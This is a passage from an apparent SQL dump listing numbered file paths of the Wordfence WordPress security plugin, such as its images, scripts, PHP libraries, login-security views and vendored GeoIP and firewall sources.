nt/plugins/wordfence/images/forward_enabled.jpg'),(1029,'wp-content/plugins/wordfence/images/help.png'),(1030,'wp-content/plugins/wordfence/images/icons/ajax24.gif'),(1031,'wp-content/plugins/wordfence/images/icons/ajax3.gif'),(1032,'wp-content/plugins/wordfence/images/icons/ajaxRed16.gif'),(1033,'wp-content/plugins/wordfence/images/icons/ajaxScan.gif'),(1034,'wp-content/plugins/wordfence/images/icons/ajaxWhite32x32.gif'),(1035,'wp-content/plugins/wordfence/images/icons/arrow_refresh.png'),(1036,'wp-content/plugins/wordfence/images/icons/bullet_yellow.png'),(1037,'wp-content/plugins/wordfence/images/icons/email_go.png'),(1038,'wp-content/plugins/wordfence/images/icons/error128.png'),(1039,'wp-content/plugins/wordfence/images/icons/magnifier.png'),(1040,'wp-content/plugins/wordfence/images/icons/tick128.png'),(1041,'wp-content/plugins/wordfence/images/icons/warning128.png'),(1042,'wp-content/plugins/wordfence/images/icons/working-indicator.gif'),(1043,'wp-content/plugins/wordfence/images/lightbox-controls.png'),(1044,'wp-content/plugins/wordfence/images/loading.gif'),(1045,'wp-content/plugins/wordfence/images/loading_background.png'),(1046,'wp-content/plugins/wordfence/images/loading_large.gif'),(1047,'wp-content/plugins/wordfence/images/logo.png'),(1048,'wp-content/plugins/wordfence/images/options.svg'),(1049,'wp-content/plugins/wordfence/images/ratelimiting.svg'),(1050,'wp-content/plugins/wordfence/images/sort_asc.gif'),(1051,'wp-content/plugins/wordfence/images/sort_asc.png'),(1052,'wp-content/plugins/wordfence/images/sort_asc_disabled.gif'),(1053,'wp-content/plugins/wordfence/images/sort_asc_disabled.png'),(1054,'wp-content/plugins/wordfence/images/sort_both.gif'),(1055,'wp-content/plugins/wordfence/images/sort_both.png'),(1056,'wp-content/plugins/wordfence/images/sort_desc.gif'),(1057,'wp-content/plugins/wordfence/images/sort_desc.png'),(1058,'wp-content/plugins/wordfence/images/sort_desc_disabled.gif'),(1059,'wp-content/plugins/wordfence/images/sort_desc_disabled.png'),(1060,'wp-content/plugins/wordfence/images/support.svg'),(1061,'wp-content/plugins/wordfence/images/tools.svg'),(1062,'wp-content/plugins/wordfence/images/wf-central-logo.svg'),(1063,'wp-content/plugins/wordfence/images/wf-error-badge.svg'),(1064,'wp-content/plugins/wordfence/images/wf-horizontal.svg'),(1065,'wp-content/plugins/wordfence/images/wordfence-logo.svg'),(1066,'wp-content/plugins/wordfence/index.php'),(1067,'wp-content/plugins/wordfence/js/Chart.bundle.min.1629122067.js'),(1068,'wp-content/plugins/wordfence/js/admin.1629122067.js'),(1069,'wp-content/plugins/wordfence/js/admin.ajaxWatcher.1629122067.js'),(1070,'wp-content/plugins/wordfence/js/admin.liveTraffic.1629122067.js'),(1071,'wp-content/plugins/wordfence/js/date.1629122067.js'),(1072,'wp-content/plugins/wordfence/js/jquery-ui-timepicker-addon.1629122067.js'),(1073,'wp-content/plugins/wordfence/js/jquery.colorbox-min.1629122067.js'),(1074,'wp-content/plugins/wordfence/js/jquery.colorbox.1629122067.js'),(1075,'wp-content/plugins/wordfence/js/jquery.dataTables.min.1629122067.js'),(1076,'wp-content/plugins/wordfence/js/jquery.qrcode.min.1629122067.js'),(1077,'wp-content/plugins/wordfence/js/jquery.tmpl.min.1629122067.js'),(1078,'wp-content/plugins/wordfence/js/jquery.tools.min.1629122067.js'),(1079,'wp-content/plugins/wordfence/js/knockout-3.5.1.1629122067.js'),(1080,'wp-content/plugins/wordfence/js/wfdashboard.1629122067.js'),(1081,'wp-content/plugins/wordfence/js/wfdropdown.1629122067.js'),(1082,'wp-content/plugins/wordfence/js/wfglobal.1629122067.js'),(1083,'wp-content/plugins/wordfence/js/wfi18n.1629122067.js'),(1084,'wp-content/plugins/wordfence/js/wfpopover.1629122067.js'),(1085,'wp-content/plugins/wordfence/js/wfselect2.min.1629122067.js'),(1086,'wp-content/plugins/wordfence/languages/wordfence.mo'),(1087,'wp-content/plugins/wordfence/languages/wordfence.po'),(1088,'wp-content/plugins/wordfence/lib/.htaccess'),(1089,'wp-content/plugins/wordfence/lib/Diff/Renderer/Abstract.php'),(1090,'wp-content/plugins/wordfence/lib/Diff/Renderer/Html/Array.php'),(1091,'wp-content/plugins/wordfence/lib/Diff/Renderer/Html/SideBySide.php'),(1092,'wp-content/plugins/wordfence/lib/Diff/SequenceMatcher.php'),(1093,'wp-content/plugins/wordfence/lib/Diff.php'),(1094,'wp-content/plugins/wordfence/lib/GeoLite2-Country.mmdb'),(1095,'wp-content/plugins/wordfence/lib/IPTraf.php'),(1096,'wp-content/plugins/wordfence/lib/IPTrafList.php'),(1097,'wp-content/plugins/wordfence/lib/WFLSPHP52Compatability.php'),(1098,'wp-content/plugins/wordfence/lib/compat.php'),(1099,'wp-content/plugins/wordfence/lib/dashboard/widget_content_countries.php'),(1100,'wp-content/plugins/wordfence/lib/dashboard/widget_content_ips.php'),(1101,'wp-content/plugins/wordfence/lib/dashboard/widget_content_logins.php'),(1102,'wp-content/plugins/wordfence/lib/dashboard/widget_countries.php'),(1103,'wp-content/plugins/wordfence/lib/dashboard/widget_ips.php'),(1104,'wp-content/plugins/wordfence/lib/dashboard/widget_localattacks.php'),(1105,'wp-content/plugins/wordfence/lib/dashboard/widget_logins.php'),(1106,'wp-content/plugins/wordfence/lib/dashboard/widget_networkattacks.php'),(1107,'wp-content/plugins/wordfence/lib/dashboard/widget_notifications.php'),(1108,'wp-content/plugins/wordfence/lib/diffResult.php'),(1109,'wp-content/plugins/wordfence/lib/email_genericAlert.php'),(1110,'wp-content/plugins/wordfence/lib/email_newIssues.php'),(1111,'wp-content/plugins/wordfence/lib/email_unlockRequest.php'),(1112,'wp-content/plugins/wordfence/lib/email_unsubscribeRequest.php'),(1113,'wp-content/plugins/wordfence/lib/flags.php'),(1114,'wp-content/plugins/wordfence/lib/live_activity.php'),(1115,'wp-content/plugins/wordfence/lib/menu_dashboard.php'),(1116,'wp-content/plugins/wordfence/lib/menu_dashboard_options.php'),(1117,'wp-content/plugins/wordfence/lib/menu_firewall.php'),(1118,'wp-content/plugins/wordfence/lib/menu_firewall_blocking.php'),(1119,'wp-content/plugins/wordfence/lib/menu_firewall_blocking_options.php'),(1120,'wp-content/plugins/wordfence/lib/menu_firewall_waf.php'),(1121,'wp-content/plugins/wordfence/lib/menu_firewall_waf_options.php'),(1122,'wp-content/plugins/wordfence/lib/menu_options.php'),(1123,'wp-content/plugins/wordfence/lib/menu_scanner.php'),(1124,'wp-content/plugins/wordfence/lib/menu_scanner_credentials.php'),(1125,'wp-content/plugins/wordfence/lib/menu_scanner_options.php'),(1126,'wp-content/plugins/wordfence/lib/menu_support.php'),(1127,'wp-content/plugins/wordfence/lib/menu_tools.php'),(1128,'wp-content/plugins/wordfence/lib/menu_tools_diagnostic.php'),(1129,'wp-content/plugins/wordfence/lib/menu_tools_importExport.php'),(1130,'wp-content/plugins/wordfence/lib/menu_tools_livetraffic.php'),(1131,'wp-content/plugins/wordfence/lib/menu_tools_twoFactor.php'),(1132,'wp-content/plugins/wordfence/lib/menu_tools_whois.php'),(1133,'wp-content/plugins/wordfence/lib/menu_wordfence_central.php'),(1134,'wp-content/plugins/wordfence/lib/noc1.key'),(1135,'wp-content/plugins/wordfence/lib/rest-api/wfRESTAuthenticationController.php'),(1136,'wp-content/plugins/wordfence/lib/rest-api/wfRESTBaseController.php'),(1137,'wp-content/plugins/wordfence/lib/rest-api/wfRESTConfigController.php'),(1138,'wp-content/plugins/wordfence/lib/rest-api/wfRESTScanController.php'),(1139,'wp-content/plugins/wordfence/lib/sysinfo.php'),(1140,'wp-content/plugins/wordfence/lib/viewFullActivityLog.php'),(1141,'wp-content/plugins/wordfence/lib/wf503.php'),(1142,'wp-content/plugins/wordfence/lib/wfAPI.php'),(1143,'wp-content/plugins/wordfence/lib/wfActivityReport.php'),(1144,'wp-content/plugins/wordfence/lib/wfAdminNoticeQueue.php'),(1145,'wp-content/plugins/wordfence/lib/wfAlerts.php'),(1146,'wp-content/plugins/wordfence/lib/wfArray.php'),(1147,'wp-content/plugins/wordfence/lib/wfBrowscap.php'),(1148,'wp-content/plugins/wordfence/lib/wfBrowscapCache.php'),(1149,'wp-content/plugins/wordfence/lib/wfBulkCountries.php'),(1150,'wp-content/plugins/wordfence/lib/wfCache.php'),(1151,'wp-content/plugins/wordfence/lib/wfCentralAPI.php'),(1152,'wp-content/plugins/wordfence/lib/wfConfig.php'),(1153,'wp-content/plugins/wordfence/lib/wfCrawl.php'),(1154,'wp-content/plugins/wordfence/lib/wfCredentialsController.php'),(1155,'wp-content/plugins/wordfence/lib/wfCrypt.php'),(1156,'wp-content/plugins/wordfence/lib/wfDB.php'),(1157,'wp-content/plugins/wordfence/lib/wfDashboard.php'),(1158,'wp-content/plugins/wordfence/lib/wfDateLocalization.php'),(1159,'wp-content/plugins/wordfence/lib/wfDiagnostic.php'),(1160,'wp-content/plugins/wordfence/lib/wfDict.php'),(1161,'wp-content/plugins/wordfence/lib/wfDirectoryIterator.php'),(1162,'wp-content/plugins/wordfence/lib/wfHelperBin.php'),(1163,'wp-content/plugins/wordfence/lib/wfHelperString.php'),(1164,'wp-content/plugins/wordfence/lib/wfIPWhitelist.php'),(1165,'wp-content/plugins/wordfence/lib/wfImportExportController.php'),(1166,'wp-content/plugins/wordfence/lib/wfIssues.php'),(1167,'wp-content/plugins/wordfence/lib/wfJWT.php'),(1168,'wp-content/plugins/wordfence/lib/wfLockedOut.php'),(1169,'wp-content/plugins/wordfence/lib/wfLog.php'),(1170,'wp-content/plugins/wordfence/lib/wfMD5BloomFilter.php'),(1171,'wp-content/plugins/wordfence/lib/wfModuleController.php'),(1172,'wp-content/plugins/wordfence/lib/wfNotification.php'),(1173,'wp-content/plugins/wordfence/lib/wfOnboardingController.php'),(1174,'wp-content/plugins/wordfence/lib/wfPersistenceController.php'),(1175,'wp-content/plugins/wordfence/lib/wfRESTAPI.php'),(1176,'wp-content/plugins/wordfence/lib/wfScan.php'),(1177,'wp-content/plugins/wordfence/lib/wfScanEngine.php'),(1178,'wp-content/plugins/wordfence/lib/wfSchema.php'),(1179,'wp-content/plugins/wordfence/lib/wfStyle.php'),(1180,'wp-content/plugins/wordfence/lib/wfSupportController.php'),(1181,'wp-content/plugins/wordfence/lib/wfUnlockMsg.php'),(1182,'wp-content/plugins/wordfence/lib/wfUpdateCheck.php'),(1183,'wp-content/plugins/wordfence/lib/wfUtils.php'),(1184,'wp-content/plugins/wordfence/lib/wfVersionCheckController.php'),(1185,'wp-content/plugins/wordfence/lib/wfView.php'),(1186,'wp-content/plugins/wordfence/lib/wfViewResult.php'),(1187,'wp-content/plugins/wordfence/lib/wordfenceClass.php'),(1188,'wp-content/plugins/wordfence/lib/wordfenceConstants.php'),(1189,'wp-content/plugins/wordfence/lib/wordfenceHash.php'),(1190,'wp-content/plugins/wordfence/lib/wordfenceScanner.php'),(1191,'wp-content/plugins/wordfence/lib/wordfenceURLHoover.php'),(1192,'wp-content/plugins/wordfence/models/.htaccess'),(1193,'wp-content/plugins/wordfence/models/block/wfBlock.php'),(1194,'wp-content/plugins/wordfence/models/block/wfRateLimit.php'),(1195,'wp-content/plugins/wordfence/models/common/wfGeoIP2.php'),(1196,'wp-content/plugins/wordfence/models/common/wfTab.php'),(1197,'wp-content/plugins/wordfence/models/firewall/wfFirewall.php'),(1198,'wp-content/plugins/wordfence/models/page/wfPage.php'),(1199,'wp-content/plugins/wordfence/models/scanner/wfScanner.php'),(1200,'wp-content/plugins/wordfence/modules/login-security/classes/.htaccess'),(1201,'wp-content/plugins/wordfence/modules/login-security/classes/controller/ajax.php'),(1202,'wp-content/plugins/wordfence/modules/login-security/classes/controller/captcha.php'),(1203,'wp-content/plugins/wordfence/modules/login-security/classes/controller/cron.php'),(1204,'wp-content/plugins/wordfence/modules/login-security/classes/controller/db.php'),(1205,'wp-content/plugins/wordfence/modules/login-security/classes/controller/notices.php'),(1206,'wp-content/plugins/wordfence/modules/login-security/classes/controller/permissions.php'),(1207,'wp-content/plugins/wordfence/modules/login-security/classes/controller/settings.php'),(1208,'wp-content/plugins/wordfence/modules/login-security/classes/controller/support.php'),(1209,'wp-content/plugins/wordfence/modules/login-security/classes/controller/time.php'),(1210,'wp-content/plugins/wordfence/modules/login-security/classes/controller/totp.php'),(1211,'wp-content/plugins/wordfence/modules/login-security/classes/controller/users.php'),(1212,'wp-content/plugins/wordfence/modules/login-security/classes/controller/whitelist.php'),(1213,'wp-content/plugins/wordfence/modules/login-security/classes/controller/wordfencels.php'),(1214,'wp-content/plugins/wordfence/modules/login-security/classes/model/asset.php'),(1215,'wp-content/plugins/wordfence/modules/login-security/classes/model/compat.php'),(1216,'wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/base2n.php'),(1217,'wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/jwt.php'),(1218,'wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/symmetric.php'),(1219,'wp-content/plugins/wordfence/modules/login-security/classes/model/crypto.php'),(1220,'wp-content/plugins/wordfence/modules/login-security/classes/model/ip.php'),(1221,'wp-content/plugins/wordfence/modules/login-security/classes/model/notice.php'),(1222,'wp-content/plugins/wordfence/modules/login-security/classes/model/request.php'),(1223,'wp-content/plugins/wordfence/modules/login-security/classes/model/settings/db.php'),(1224,'wp-content/plugins/wordfence/modules/login-security/classes/model/settings/wpoptions.php'),(1225,'wp-content/plugins/wordfence/modules/login-security/classes/model/settings.php'),(1226,'wp-content/plugins/wordfence/modules/login-security/classes/model/text/html.php'),(1227,'wp-content/plugins/wordfence/modules/login-security/classes/model/text/javascript.php'),(1228,'wp-content/plugins/wordfence/modules/login-security/classes/model/tokenbucket.php'),(1229,'wp-content/plugins/wordfence/modules/login-security/classes/model/view/tab.php'),(1230,'wp-content/plugins/wordfence/modules/login-security/classes/model/view/title.php'),(1231,'wp-content/plugins/wordfence/modules/login-security/classes/model/view.php'),(1232,'wp-content/plugins/wordfence/modules/login-security/css/admin-global.1629122067.css'),(1233,'wp-content/plugins/wordfence/modules/login-security/css/admin.1629122067.css'),(1234,'wp-content/plugins/wordfence/modules/login-security/css/colorbox.1629122067.css'),(1235,'wp-content/plugins/wordfence/modules/login-security/css/font-awesome.1629122067.css'),(1236,'wp-content/plugins/wordfence/modules/login-security/css/ionicons.1629122067.css'),(1237,'wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.min.1629122067.css'),(1238,'wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.structure.min.1629122067.css'),(1239,'wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.theme.min.1629122067.css'),(1240,'wp-content/plugins/wordfence/modules/login-security/css/login.1629122067.css'),(1241,'wp-content/plugins/wordfence/modules/login-security/img/header.svg'),(1242,'wp-content/plugins/wordfence/modules/login-security/img/lightbox-controls.png'),(1243,'wp-content/plugins/wordfence/modules/login-security/img/loading.gif'),(1244,'wp-content/plugins/wordfence/modules/login-security/img/loading_background.png'),(1245,'wp-content/plugins/wordfence/modules/login-security/img/menu.svg'),(1246,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_444444_256x240.png'),(1247,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_555555_256x240.png'),(1248,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777620_256x240.png'),(1249,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777777_256x240.png'),(1250,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_cc0000_256x240.png'),(1251,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_ffffff_256x240.png'),(1252,'wp-content/plugins/wordfence/modules/login-security/js/admin-global.1629122067.js'),(1253,'wp-content/plugins/wordfence/modules/login-security/js/admin.1629122067.js'),(1254,'wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.1629122067.js'),(1255,'wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.min.1629122067.js'),(1256,'wp-content/plugins/wordfence/modules/login-security/js/jquery.qrcode.min.1629122067.js'),(1257,'wp-content/plugins/wordfence/modules/login-security/js/jquery.tmpl.min.1629122067.js'),(1258,'wp-content/plugins/wordfence/modules/login-security/js/login.1629122067.js'),(1259,'wp-content/plugins/wordfence/modules/login-security/views/.htaccess'),(1260,'wp-content/plugins/wordfence/modules/login-security/views/common/modal-prompt.php'),(1261,'wp-content/plugins/wordfence/modules/login-security/views/common/reset-grace-period.php'),(1262,'wp-content/plugins/wordfence/modules/login-security/views/common/revoke-grace-period.php'),(1263,'wp-content/plugins/wordfence/modules/login-security/views/email/login-verification.php'),(1264,'wp-content/plugins/wordfence/modules/login-security/views/manage/activate.php'),(1265,'wp-content/plugins/wordfence/modules/login-security/views/manage/code.php'),(1266,'wp-content/plugins/wordfence/modules/login-security/views/manage/deactivate.php'),(1267,'wp-content/plugins/wordfence/modules/login-security/views/manage/grace-period.php'),(1268,'wp-content/plugins/wordfence/modules/login-security/views/manage/regenerate.php'),(1269,'wp-content/plugins/wordfence/modules/login-security/views/onboarding/standalone-header.php'),(1270,'wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha-threshold.php'),(1271,'wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha.php'),(1272,'wp-content/plugins/wordfence/modules/login-security/views/options/option-ip-source.php'),(1273,'wp-content/plugins/wordfence/modules/login-security/views/options/option-label.php'),(1274,'wp-content/plugins/wordfence/modules/login-security/views/options/option-ntp.php'),(1275,'wp-content/plugins/wordfence/modules/login-security/views/options/option-roles.php'),(1276,'wp-content/plugins/wordfence/modules/login-security/views/options/option-select.php'),(1277,'wp-content/plugins/wordfence/modules/login-security/views/options/option-switch.php'),(1278,'wp-content/plugins/wordfence/modules/login-security/views/options/option-text.php'),(1279,'wp-content/plugins/wordfence/modules/login-security/views/options/option-textarea.php'),(1280,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-boolean-switch.php'),(1281,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-multiple.php'),(1282,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-segmented.php'),(1283,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-select.php'),(1284,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-sub.php'),(1285,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-textarea.php'),(1286,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled.php'),(1287,'wp-content/plugins/wordfence/modules/login-security/views/options/option-token.php'),(1288,'wp-content/plugins/wordfence/modules/login-security/views/page/manage.php'),(1289,'wp-content/plugins/wordfence/modules/login-security/views/page/page.php'),(1290,'wp-content/plugins/wordfence/modules/login-security/views/page/role.php'),(1291,'wp-content/plugins/wordfence/modules/login-security/views/page/section-title.php'),(1292,'wp-content/plugins/wordfence/modules/login-security/views/page/settings.php'),(1293,'wp-content/plugins/wordfence/modules/login-security/views/page/tabbar.php'),(1294,'wp-content/plugins/wordfence/modules/login-security/views/settings/options.php'),(1295,'wp-content/plugins/wordfence/modules/login-security/views/settings/user-stats.php'),(1296,'wp-content/plugins/wordfence/modules/login-security/views/user/grace-period-toggle.php'),(1297,'wp-content/plugins/wordfence/modules/login-security/wordfence-login-security.php'),(1298,'wp-content/plugins/wordfence/readme.txt'),(1299,'wp-content/plugins/wordfence/tmp/.htaccess'),(1300,'wp-content/plugins/wordfence/vendor/.htaccess'),(1301,'wp-content/plugins/wordfence/vendor/autoload.php'),(1302,'wp-content/plugins/wordfence/vendor/composer/ClassLoader.php'),(1303,'wp-content/plugins/wordfence/vendor/composer/LICENSE'),(1304,'wp-content/plugins/wordfence/vendor/composer/autoload_classmap.php'),(1305,'wp-content/plugins/wordfence/vendor/composer/autoload_namespaces.php'),(1306,'wp-content/plugins/wordfence/vendor/composer/autoload_psr4.php'),(1307,'wp-content/plugins/wordfence/vendor/composer/autoload_real.php'),(1308,'wp-content/plugins/wordfence/vendor/composer/autoload_static.php'),(1309,'wp-content/plugins/wordfence/vendor/composer/ca-bundle/LICENSE'),(1310,'wp-content/plugins/wordfence/vendor/composer/ca-bundle/res/cacert.pem'),(1311,'wp-content/plugins/wordfence/vendor/composer/ca-bundle/src/CaBundle.php'),(1312,'wp-content/plugins/wordfence/vendor/composer/installed.json'),(1313,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/.gitmodules'),(1314,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/.php_cs'),(1315,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/LICENSE'),(1316,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Database/Reader.php'),(1317,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/AddressNotFoundException.php'),(1318,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/AuthenticationException.php'),(1319,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/GeoIp2Exception.php'),(1320,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/HttpException.php'),(1321,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/InvalidRequestException.php'),(1322,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/OutOfQueriesException.php'),(1323,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/AbstractModel.php'),(1324,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/AnonymousIp.php'),(1325,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Asn.php'),(1326,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/City.php'),(1327,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/ConnectionType.php'),(1328,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Country.php'),(1329,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Domain.php'),(1330,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Enterprise.php'),(1331,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Insights.php'),(1332,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Isp.php'),(1333,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/ProviderInterface.php'),(1334,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/AbstractPlaceRecord.php'),(1335,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/AbstractRecord.php'),(1336,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/City.php'),(1337,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Continent.php'),(1338,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Country.php'),(1339,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Location.php'),(1340,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/MaxMind.php'),(1341,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Postal.php'),(1342,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/RepresentedCountry.php'),(1343,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Subdivision.php'),(1344,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Traits.php'),(1345,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/WebService/Client.php'),(1346,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/LICENSE'),(1347,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/AuthenticationException.php'),(1348,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/HttpException.php'),(1349,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InsufficientFundsException.php'),(1350,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InvalidInputException.php'),(1351,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InvalidRequestException.php'),(1352,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/IpAddressNotFoundException.php'),(1353,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/PermissionRequiredException.php'),(1354,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/WebServiceException.php'),(1355,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Client.php'),(1356,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/CurlRequest.php'),(1357,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/Request.php'),(1358,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/RequestFactory.php'),(1359,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/LICENSE'),(1360,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/autoload.php'),(1361,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Decoder.php'),(1362,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/InvalidDatabaseException.php'),(1363,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Metadata.php'),(1364,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Util.php'),(1365,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader.php'),(1366,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/cacert.pem'),(1367,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/falsepositive.key'),(1368,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/init.php'),(1369,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/config.php'),(1370,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/http.php'),(1371,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/i18n.php'),(1372,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/json.php'),(1373,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/lexer.php'),(1374,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/parser.php'),(1375,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/sqli.php'),(1376,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/request.php'),(1377,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/rules.php'),(1378,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/file.php'),(1379,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/mysql.php'),(1380,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage.php'),(1381,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/utils.php'),(1382,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/view.php'),(1383,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/waf.php'),(1384,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/xmlrpc.php'),(1385,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/rules.key'),(1386,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-blacklist.php'),(1387,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-roadblock.php'),(1388,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403.php'),(1389,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503-lockout.php'),(1390,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503.php'),(1391,'wp-content/plugins/wordfence/views/.htaccess'),(1392,'wp-content/plugins/wordfence/views/blocking/block-list.php'),(1393,'wp-content/plugins/wordfence/views/blocking/blocking-create.php'),(1394,'wp-content/plugins/wordfence/views/blocking/blocking-status.php'),(1395,'wp-content/plugins/wordfence/views/blocking/country-block-map.php'),(1396,'wp-content/plugins/wordfence/views/blocking/country-modal.php'),(1397,'wp-content/plugins/wordfence/views/blocking/option-bypass-cookie.php'),(1398,'wp-content/plugins/wordfence/views/blocking/option-bypass-redirect.php'),(1399,'wp-content/plugins/wordfence/views/blocking/options-group-advanced-country.php'),(1400,'wp-content/plugins/wordfence/views/common/block-navigation-option.php'),(1401,'wp-content/plugins/wordfence/views/common/indeterminate-progress.php'),(1402,'wp-content/plugins/wordfence/views/common/license.php'),(1403,'wp-content/plugins/wordfence/views/common/modal-prompt.php'),(1404,'wp-content/plugins/wordfence/views/common/page-fixed-tabbar.php'),(1405,'wp-content/plugins/wordfence/views/common/page-help.php'),(1406,'wp-content/plugins/wordfence/views/common/page-tabbar.php'),(1407,'wp-content/plugins/wordfence/views/common/page-title.php'),(1408,'wp-content/plugins/wordfence/views/common/section-subtitle.php'),(1409,'wp-content/plugins/wordfence/views/common/section-title.php'),(1410,'wp-content/plugins/wordfence/views/common/status-circular.php'),(1411,'wp-content/plugins/wordfence/views/common/status-critical.php'),(1412,'wp-content/plugins/wordfence/views/common/status-detail.php'),(1413,'wp-content/plugins/wordfence/views/common/status-tooltip.php'),(1414,'wp-content/plugins/wordfence/views/common/status-warning.php'),(1415,'wp-content/plugins/wordfence/views/common/unsubscribe.php'),(1416,'wp-content/plugins/wordfence/views/dashboard/global-status.php'),(1417,'wp-content/plugins/wordfence/views/dashboard/option-howgetips.php'),(1418,'wp-content/plugins/wordfence/views/dashboard/options-group-alert.php'),(1419,'wp-content/plugins/wordfence/views/dashboard/options-group-dashboard.php'),(1420,'wp-content/plugins/wordfence/views/dashboard/options-group-email-summary.php'),(1421,'wp-content/plugins/wordfence/views/dashboard/options-group-general.php'),(1422,'wp-content/plugins/wordfence/views/dashboard/options-group-import.php'),(1423,'wp-content/plugins/wordfence/views/dashboard/options-group-license.php'),(1424,'wp-content/p